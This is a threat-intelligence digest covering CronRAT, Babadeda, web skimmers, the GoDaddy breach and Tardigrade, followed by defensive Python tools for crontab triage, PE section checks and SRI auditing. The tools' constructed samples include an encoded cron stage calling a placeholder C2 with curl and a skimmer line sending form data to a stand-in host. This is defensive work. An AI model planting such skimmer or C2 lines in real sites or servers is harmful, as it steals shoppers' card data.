November 30, 2021 - Anomali Threat Research

Anomali Cyber Watch: Web Skimmers Victimize Holiday Shoppers, Tardigrade Targets Vaccine Manufacturers, Babadeda Crypter Targets Crypto Community, and More

<p>The threat intelligence stories in this iteration of the Anomali Cyber Watch cover the following topics: <b>Data breach, Stealthy malware, Vulnerabilities</b> and <b>Web skimmers</b>. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.</p> <p><img src="https://cdn.filestackcontent.com/dAG59TxHT7KTYiHBLsmZ"/><br/> <em>Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.</em></p> <h2>Trending Cyber News and Threat Intelligence</h2> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://blog.0patch.com/2021/11/micropatching-unpatched-local-privilege.html" target="_blank">Micropatching Unpatched Local Privilege Escalation in Mobile Device Management Service (CVE-2021-24084 / 0day)</a></h3> <p>(published: November 26, 2021)</p> <p>The 0patch team has released free, unofficial micropatches that protect Windows 10 users from an unpatched local privilege escalation (LPE) zero-day in the Mobile Device Management Service. The flaw is reachable through the "Access work or school" settings page and exists because Microsoft's February patch for the information disclosure vulnerability CVE-2021-24084 was incomplete and can be bypassed. Security researcher Abdelhamid Naceri publicly disclosed the bypass in June and found this month that the same flaw can also be exploited to gain administrator privileges. He has also published a proof of concept (PoC) for a related vulnerability affecting Windows 11.<br/> <b>Analyst Comment:</b> Check whether your Windows 10 build is affected and, if so, apply the appropriate free micropatches. Plan to patch your Windows 11 systems as soon as an official security update becomes available. 
Since a PoC for the Windows 11 privilege escalation is now public, an attacker who gains any foothold on a host can quickly reach administrator; harden systems against initial access, because an LPE is only useful to an attacker who already has code running on the machine.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947233" target="_blank">[MITRE ATT&amp;CK] Exploitation for Privilege Escalation - T1068</a><br/> <b>Tags:</b> CVE-2021-24084, Vulnerability, Micropatching, Privilege escalation, LPE, Administrative access, Zero-day, Windows, Windows 10, Windows 11</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://sansec.io/research/cronrat" target="_blank">CronRAT Malware Hides Behind February 31st</a></h3> <p>(published: November 24, 2021)</p> <p>Sansec researchers have discovered CronRAT, a new Linux remote access trojan (RAT) used in Magecart attacks: it is deployed on the servers of vulnerable web stores and drops payment skimmers there. Because the skimmer modifies server-side code rather than the JavaScript delivered to the browser, browser-based skimming protections never see it. CronRAT hides in the Linux cron subsystem: its payload is compressed, Base64-encoded and hidden in the names of cron tasks that are scheduled for a nonexistent date such as February 31st. Cron accepts such entries as syntactically valid but never executes them, so they neither produce execution errors nor draw a system administrator's attention. Further stealth techniques include anti-tampering checksums, command and control over an obfuscated binary protocol, a control server disguised as a Dropbear SSH service, fileless execution, launching a tandem RAT in a separate Linux subsystem, and timing modulation.<br/> <b>Analyst Comment:</b> Websites, much like personal workstations, require constant maintenance to keep up with the latest threats. All external-facing assets should be monitored and scanned for vulnerabilities, and threats like CronRAT make it critical that server software is kept up to date. 
Review the crontabs on web servers (system-wide and per-user) for entries with impossible dates or long encoded strings, since cron itself will not complain about them. The ability to restore quickly from backup, an incident response plan, and customer communication channels should all be established before a breach occurs. In addition, supply chain attacks are becoming more frequent as threat actors' Tactics, Techniques, and Procedures (TTPs) evolve, so it is paramount that all applications in use by your company are properly maintained and monitored for unusual activity.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947127" target="_blank">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/947235" target="_blank">[MITRE ATT&amp;CK] Obfuscated Files or Information - T1027</a> | <a href="https://ui.threatstream.com/ttp/947136" target="_blank">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a> | <a href="https://ui.threatstream.com/ttp/947194" target="_blank">[MITRE ATT&amp;CK] Indicator Removal on Host - T1070</a> | <a href="https://ui.threatstream.com/ttp/3904527" target="_blank">[MITRE ATT&amp;CK] Ingress Tool Transfer - T1105</a><br/> <b>Tags:</b> CronRAT, Linux, Magecart, Server-side, Cron job, Stealthiness, Dropbear SSH</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://threatpost.com/godaddy-breach-widens-reseller-subsidiaries/176575/" target="_blank">GoDaddy Breach Widens to Include Reseller Subsidiaries</a></h3> <p>(published: November 24, 2021)</p> <p>The GoDaddy breach affecting 1.2 million customers has widened to include subsidiaries that resell GoDaddy's Managed WordPress hosting environment: Domain Factory, Heart Internet, Host Europe, Media Temple, tsoHost, and 123Reg. GoDaddy confirmed that customers of several of these brands were affected by the security incident. 
The breach exposed customers' email addresses and customer numbers, as well as the original WordPress admin password set when the hosting service was first provisioned. Active customers additionally had their SFTP and database usernames and passwords and their SSL/TLS private key exposed.<br/> <b>Analyst Comment:</b> GoDaddy is reissuing and installing new certificates for affected Managed WordPress customers. Affected site owners should not wait for the provider: rotate the WordPress admin, SFTP and database credentials now, and treat the old TLS private key as compromised until the new certificate is in place. More generally, follow secure password practices and never store customer passwords in clear text; the fact that the original provisioning-time admin password could be read at all is what made this breach so damaging.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947231" target="_blank">[MITRE ATT&amp;CK] Valid Accounts - T1078</a><br/> <b>Tags:</b> GoDaddy, WordPress, 123Reg, Domain Factory, Heart Internet, Host Europe, Media Temple, tsoHost, Breach</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities" target="_blank">The BABADEDA Crypter - an Emerging Crypter Targeting the Crypto, NFT, and DeFi Communities</a></h3> <p>(published: November 23, 2021)</p> <p>Morphisec Labs researchers have discovered a new malware campaign, spread through Discord, that uses the Babadeda crypter to hide its payloads and targets the cryptocurrency, NFT and DeFi communities. Since May 2021, Babadeda has been used in a variety of campaigns to deliver information stealers, remote access trojans (RATs), and even LockBit ransomware; in this campaign it was observed dropping Remcos and BitRAT. The actors lure victims to decoy sites on typosquatted domains served with valid Let's Encrypt certificates. Babadeda evades signature-based antivirus during execution by marking the executable's .text section Read-Write-Execute (RWE) at build time, so the payload can be decrypted in place and run without ever calling the heavily monitored VirtualAlloc and VirtualProtect functions. 
At each stage, the actor embeds the malicious code inside otherwise legitimate code to confuse analysts, disguise its real intent, and make detection harder for antivirus solutions.<br/> <b>Analyst Comment:</b> Despite the observed evasion techniques and low detection rate, the researchers were able to both detect and stop Babadeda. Educate users on phishing threats, block the known indicators of compromise (IOCs) via Anomali Match, use Morphisec's YARA signatures for Babadeda, and consider tooling that morphs process memory so that the crypter's deployment stage is trapped. A cheap static triage signal is a PE whose code section is mapped writable and executable; legitimate binaries rarely ship that way, though some packers and JIT runtimes do.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947136" target="_blank">[MITRE ATT&amp;CK] Deobfuscate/Decode Files or Information - T1140</a> | <a href="https://ui.threatstream.com/ttp/947127" target="_blank">[MITRE ATT&amp;CK] Scheduled Task - T1053</a> | <a href="https://ui.threatstream.com/ttp/3905036" target="_blank">[MITRE ATT&amp;CK] Credentials from Password Stores - T1555</a> | <a href="https://ui.threatstream.com/ttp/3904527" target="_blank">[MITRE ATT&amp;CK] Ingress Tool Transfer - T1105</a><br/> <b>Tags:</b> Babadeda, Remcos, BitRAT, Amadey, CryptBot, Ursnif, SmokeLoader, Information stealer, RAT, LockBit, FickerStealer, Metasploit, QuasarRAT, Ransomware, Cryptocurrency, NFT, DeFi, Typosquatting, Evasion</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://www.ncsc.gov.uk/news/guidance-for-retailers-to-prevent-websites-becoming-black-friday-cyber-traps" target="_blank">Guidance for Retailers to Prevent Websites Becoming Black Friday Cyber Traps</a></h3> <p>(published: November 22, 2021)</p> <p>The UK’s National Cyber Security Centre (NCSC) has warned small online shops to watch for card skimmers in the run-up to Black Friday. The NCSC identified 4,151 compromised online shops in the period up to the end of September. 
Skimmers are snippets of malicious code injected into legitimate websites to steal shoppers’ card details as they are entered. The longer a skimmer stays on a site before its owner or customers notice, the more card data the criminals harvest, so they make it as unobtrusive as possible. The Magento e-commerce platform is heavily targeted because of its popularity, but any platform with known, unpatched vulnerabilities is a target as well.<br/> <b>Analyst Comment:</b> No business is too small to be compromised. Keep website software and extensions up to date and adhere to secure administration and password practices. Additional protection comes from a Web Application Firewall (WAF), Subresource Integrity (SRI) attributes on third-party scripts so that a modified script fails to load, a Content Security Policy that restricts where scripts may be loaded from and where form data may be sent, and/or a third-party integrity monitoring service that alerts when page content changes.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947138" target="_blank">[MITRE ATT&amp;CK] Exploit Public-Facing Application - T1190</a> | <a href="https://ui.threatstream.com/ttp/947243" target="_blank">[MITRE ATT&amp;CK] Input Capture - T1056</a><br/> <b>Tags:</b> Web skimmers, Credit card, Skimming, Online shopping, Website compromise</p> </div> <div class="trending-threat-article"> <h3 id="article-1"><a href="https://www.isac.bio/post/tardigrade" target="_blank">Tardigrade: An APT Attack on Vaccine Manufacturing Infrastructure</a></h3> <p>(published: November 22, 2021)</p> <p>The advanced persistent threat (APT) group Tardigrade has been targeting biomanufacturing facilities and research centers working on vaccines and critical medicines since at least January 2020, according to the Bioeconomy Information Sharing and Analysis Center (BIO-ISAC). The group uses a heavily customized variant of the SmokeLoader malware to spread through compromised networks and exfiltrate data over long periods without being noticed. 
Notably, the variant can recompile the loader from memory without leaving a consistent signature, which makes it harder to identify, trace, and remove. SmokeLoader serves as the actors' stealthy entry point: it downloads further payloads, manipulates files, and deploys additional modules. The actors were also seen deploying ransomware, apparently to mask their information-stealing activity.<br/> <b>Analyst Comment:</b> Ensure that network defense policies are in place and enforced. Aggressively segment machines running outdated operating systems and accelerate their upgrade timelines. Use antivirus with behavioral analysis capabilities, since a loader that recompiles itself in memory defeats static signatures. Provide anti-phishing training and maintain offline backups.<br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947094" target="_blank">[MITRE ATT&amp;CK] External Remote Services - T1133</a> | <a href="https://ui.threatstream.com/ttp/3905074" target="_blank">[MITRE ATT&amp;CK] Phishing - T1566</a> | <a href="https://ui.threatstream.com/ttp/947137" target="_blank">[MITRE ATT&amp;CK] Supply Chain Compromise - T1195</a> | <a href="https://ui.threatstream.com/ttp/947220" target="_blank">[MITRE ATT&amp;CK] Trusted Relationship - T1199</a> | <a href="https://ui.threatstream.com/ttp/947231" target="_blank">[MITRE ATT&amp;CK] Valid Accounts - T1078</a> | <a href="https://ui.threatstream.com/ttp/3905086" target="_blank">[MITRE ATT&amp;CK] Inter-Process Communication - T1559</a> | <a href="https://ui.threatstream.com/ttp/3905040" target="_blank">[MITRE ATT&amp;CK] Create or Modify System Process - T1543</a> | <a href="https://ui.threatstream.com/ttp/947166" target="_blank">[MITRE ATT&amp;CK] Modify Registry - T1112</a> | <a href="https://ui.threatstream.com/ttp/3905776" target="_blank">[MITRE ATT&amp;CK] Hide Artifacts - T1564</a> | <a href="https://ui.threatstream.com/ttp/2402543" target="_blank">[MITRE ATT&amp;CK] Virtualization/Sandbox Evasion - T1497</a> | <a href="https://ui.threatstream.com/ttp/3904494" target="_blank">[MITRE ATT&amp;CK] Exfiltration Over C2 Channel - T1041</a><br/> <b>Tags:</b> Tardigrade, APT, SmokeLoader, Vaccine, Cobalt Strike, Conti, Ryuk, Ransomware, Espionage, Medical, COVID-19</p> </div>
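The CronRAT technique described in the CronRAT article above (a payload hidden in cron entries that are scheduled for a date that never comes) is easy to hunt for once you know what to look for. The following is an added example written for this page; it is not Sansec's code or tooling. It scans crontab text for two signals: a day-of-month/month combination that can never occur, and long Base64 runs that decode to something. The crontab lines, the blob and the function names are constructed for the example; the `/bin/echo` carrier command is an assumption, not the real CronRAT command line.

```python
"""Crontab triage for CronRAT-style hiding: flag entries whose schedule can never
occur (cron stores them but never runs them) and long Base64 blobs that may carry
an encoded payload. Constructed sample input; no real CronRAT artifact is used."""
import base64
import calendar
import re
import zlib
from dataclasses import dataclass, field

# Days per month in a leap year, so a legitimate "0 0 29 2 *" is not flagged.
_MAX_DAY = {m: calendar.monthrange(2024, m)[1] for m in range(1, 13)}
# 40+ Base64 characters in a row is unusual on a crontab command line.
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


@dataclass
class Finding:
    line_no: int
    line: str
    reasons: list = field(default_factory=list)
    decoded_preview: bytes = b""


def _expand(text, lo, hi):
    """Expand one cron field (value, list, range, step, '*') to a set of ints;
    None if the field is not something this small parser understands."""
    values = set()
    for part in text.split(","):
        step = 1
        if "/" in part:
            part, step_s = part.split("/", 1)
            if not step_s.isdigit():
                return None
            step = int(step_s)
        if part == "*":
            rng = range(lo, hi + 1)
        elif "-" in part and all(p.isdigit() for p in part.split("-", 1)):
            a, b = part.split("-", 1)
            rng = range(int(a), int(b) + 1)
        elif part.isdigit():
            rng = range(int(part), int(part) + 1)
        else:
            return None
        values.update(v for v in rng if (v - rng.start) % step == 0)
    return values


def never_runs(dom, mon, dow):
    """True when every listed day-of-month exceeds the length of every listed month.
    Vixie cron runs an entry when EITHER dom or dow matches if both are restricted,
    so an impossible day only silences a job whose dow field is '*'."""
    if dow != "*":
        return False
    doms, mons = _expand(dom, 1, 31), _expand(mon, 1, 12)
    if not doms or not mons:
        return False
    return all(d > _MAX_DAY.get(m, 31) for d in doms for m in mons)


def decode_blob(token):
    """Best-effort decode of a Base64 token, removing a zlib layer if present.
    Returns b'' when the token is not valid Base64."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return b""
    try:
        return zlib.decompress(raw)
    except zlib.error:
        return raw


def scan_crontab(text):
    """Return a Finding for every line that looks like a hiding place."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s:
            continue
        f = Finding(n, line)
        parts = s.split(None, 5)
        if not s.startswith("#") and len(parts) == 6 and never_runs(*parts[2:5]):
            f.reasons.append(f"impossible schedule: day {parts[2]} of month {parts[3]}")
        for tok in _B64_TOKEN.findall(s):  # comment lines are scanned too
            decoded = decode_blob(tok)
            if decoded:
                f.reasons.append(f"{len(tok)}-char Base64 blob decodes to {len(decoded)} bytes")
                f.decoded_preview = decoded[:80]
        if f.reasons:
            findings.append(f)
    return findings


# Constructed sample crontab: a benign job and one entry that cron will never
# fire, carrying a zlib-compressed, Base64-encoded second stage in its command.
_DEMO_BLOB = base64.b64encode(
    zlib.compress(b"echo constructed-demo-stage2; curl -s http://127.0.0.1/constructed-c2")
).decode()
SAMPLE_CRONTAB = "\n".join([
    "MAILTO=root",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    f"52 23 31 2 * /bin/echo {_DEMO_BLOB} >/dev/null",
])

if __name__ == "__main__":
    for hit in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {hit.line_no}: {'; '.join(hit.reasons)}")
        print(f"  preview: {hit.decoded_preview!r}")
```

Feed it the output of `crontab -l` for each user plus `/etc/crontab`, `/etc/cron.d/*` and `/var/spool/cron/crontabs/*`. Hits are triage, not verdicts: a very long path or token can look like Base64, and the decoded preview is there so you can see at a glance whether it is a shell snippet or noise.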
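Babadeda's RWE .text trick, described in the Babadeda article above, is visible statically in the PE section table before the sample is ever run. This added example is not Morphisec's code or signatures: it parses PE section headers with the Python standard library and reports sections that are both writable and executable. The header-only stub PE it builds for itself is constructed and not loadable, and the function names are chosen here; the section flag values are the documented PE constants.

```python
"""Static triage for the Babadeda trick: a PE whose code section is mapped
Read-Write-Execute can decrypt and run its payload in place without calling
VirtualAlloc/VirtualProtect. The parser and the stub PE it runs on are
constructed for the example; the section flags are the documented PE constants."""
import struct

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
# NumberOfSymbols, SizeOfOptionalHeader, Characteristics
_FILE_HEADER = "<HHIIIHH"
# IMAGE_SECTION_HEADER: Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
# PointerToRelocations, PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
_SECTION_HEADER = "<8sIIIIIIHHI"


def pe_sections(data):
    """Yield (name, characteristics) for each section header in a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    _, n_sections, _, _, _, opt_size, _ = struct.unpack_from(_FILE_HEADER, data, e_lfanew + 4)
    table = e_lfanew + 4 + struct.calcsize(_FILE_HEADER) + opt_size
    for i in range(n_sections):
        fields = struct.unpack_from(_SECTION_HEADER, data, table + i * struct.calcsize(_SECTION_HEADER))
        yield fields[0].rstrip(b"\0").decode("ascii", "replace"), fields[-1]


def rwe_sections(data):
    """Names of sections that are both writable and executable (a triage signal:
    some packers and JIT runtimes do this legitimately)."""
    return [name for name, chars in pe_sections(data)
            if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE]


def build_stub_pe(sections):
    """Constructed header-only PE (no optional header, not loadable) so the check
    runs offline; sections is a list of (name, characteristics)."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    file_hdr = struct.pack(_FILE_HEADER, 0x8664, len(sections), 0, 0, 0, 0, 0x22)
    table = b"".join(
        struct.pack(_SECTION_HEADER, name, 0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i,
                    0, 0, 0, 0, chars)
        for i, (name, chars) in enumerate(sections))
    return bytes(dos) + b"PE\0\0" + file_hdr + table


# Constructed samples: a conventionally laid-out binary and a crypter-style one.
NORMAL_PE = build_stub_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])
CRYPTER_PE = build_stub_pe([
    (b".text", IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
    (b".data", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
])

if __name__ == "__main__":
    for label, pe in (("normal", NORMAL_PE), ("crypter", CRYPTER_PE)):
        print(label, "RWE sections:", rwe_sections(pe))
```

On a real file, `rwe_sections(open(path, "rb").read())` gives the same answer. Pair the result with the other Babadeda traits the article lists (a .text section that is RWE and a binary that never calls VirtualAlloc/VirtualProtect yet still executes decrypted code) before treating a hit as more than a lead.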
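The NCSC article above recommends Subresource Integrity and integrity monitoring against web skimmers. The following added example, which is not NCSC code, implements both sides of that: it generates SRI hashes for the scripts a checkout page loads and then audits a served page, flagging scripts that no longer match their pinned hash and scripts with no integrity attribute at all. The page, the scripts, the `cdn.example` and `exfil.invalid` hosts and the function names are constructed for the example.

```python
"""Subresource Integrity (SRI) audit: compute integrity values for the scripts a
page loads and verify that what is actually served still matches them, so a
skimmer appended to a third-party script is caught. Page and scripts are
constructed for the example."""
import base64
import hashlib
from html.parser import HTMLParser

_SRI_ALGOS = ("sha256", "sha384", "sha512")  # weakest to strongest


def sri_hash(body, algo="sha384"):
    """Value for an integrity="" attribute: '<algo>-<base64 digest>'."""
    return f"{algo}-{base64.b64encode(hashlib.new(algo, body).digest()).decode()}"


def sri_matches(body, integrity):
    """Apply the browser rule: of the algorithms listed in the attribute use only
    the strongest, and accept the body if it matches any digest given for it."""
    digests = {}
    for token in integrity.split():
        algo, _, rest = token.partition("-")
        if algo in _SRI_ALGOS:
            digests.setdefault(algo, set()).add(rest.split("?", 1)[0])  # drop ?options
    if not digests:
        return False
    strongest = max(digests, key=_SRI_ALGOS.index)
    return sri_hash(body, strongest).partition("-")[2] in digests[strongest]


class _ExternalScripts(HTMLParser):
    """Collect (src, integrity) for every <script src=...> on the page."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.found.append((a["src"], a.get("integrity")))


def audit_page(html, fetch):
    """fetch(src) -> bytes returns the script as served. Returns (src, verdict) pairs:
    OK, MISMATCH (served content differs from the pinned hash: tampered or updated),
    NO_INTEGRITY (nothing pins this script, so a skimmer injected into it would load)."""
    parser = _ExternalScripts()
    parser.feed(html)
    verdicts = []
    for src, integrity in parser.found:
        if integrity is None:
            verdicts.append((src, "NO_INTEGRITY"))
        elif sri_matches(fetch(src), integrity):
            verdicts.append((src, "OK"))
        else:
            verdicts.append((src, "MISMATCH"))
    return verdicts


# Constructed scripts: the pinned hashes were taken from the clean versions; the
# tracker has since had a skimmer appended that sends the checkout form elsewhere.
CLEAN_CHECKOUT = b"window.checkout = function () { return 'constructed checkout'; };"
CLEAN_TRACKER = b"window.track = function (e) { return 'constructed tracker ' + e; };"
SKIMMED_TRACKER = CLEAN_TRACKER + (
    b"\nnew Image().src = 'https://exfil.invalid/?c=' + "
    b"encodeURIComponent(document.forms[0].innerText);")
SERVED = {
    "https://cdn.example/checkout.js": CLEAN_CHECKOUT,
    "https://cdn.example/tracker.js": SKIMMED_TRACKER,
    "/js/local.js": b"console.log('constructed, not pinned');",
}
SAMPLE_HTML = f"""<!doctype html><html><head>
<script src="https://cdn.example/checkout.js" integrity="{sri_hash(CLEAN_CHECKOUT)}" crossorigin="anonymous"></script>
<script src="https://cdn.example/tracker.js" integrity="{sri_hash(CLEAN_TRACKER)}" crossorigin="anonymous"></script>
<script src="/js/local.js"></script>
</head><body><form id="pay"></form></body></html>"""

if __name__ == "__main__":
    for src, verdict in audit_page(SAMPLE_HTML, SERVED.__getitem__):
        print(f"{verdict:13} {src}")
```

Two practical notes. A cross-origin script can only be integrity-checked if the tag carries `crossorigin` and the CDN answers with CORS headers; otherwise the browser cannot read the response and refuses to run the script, so a missing `crossorigin` breaks the page rather than silently skipping the check. And a MISMATCH fires on a legitimate vendor update too, which is the point: the new version gets reviewed before its hash is re-pinned, instead of loading unseen.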
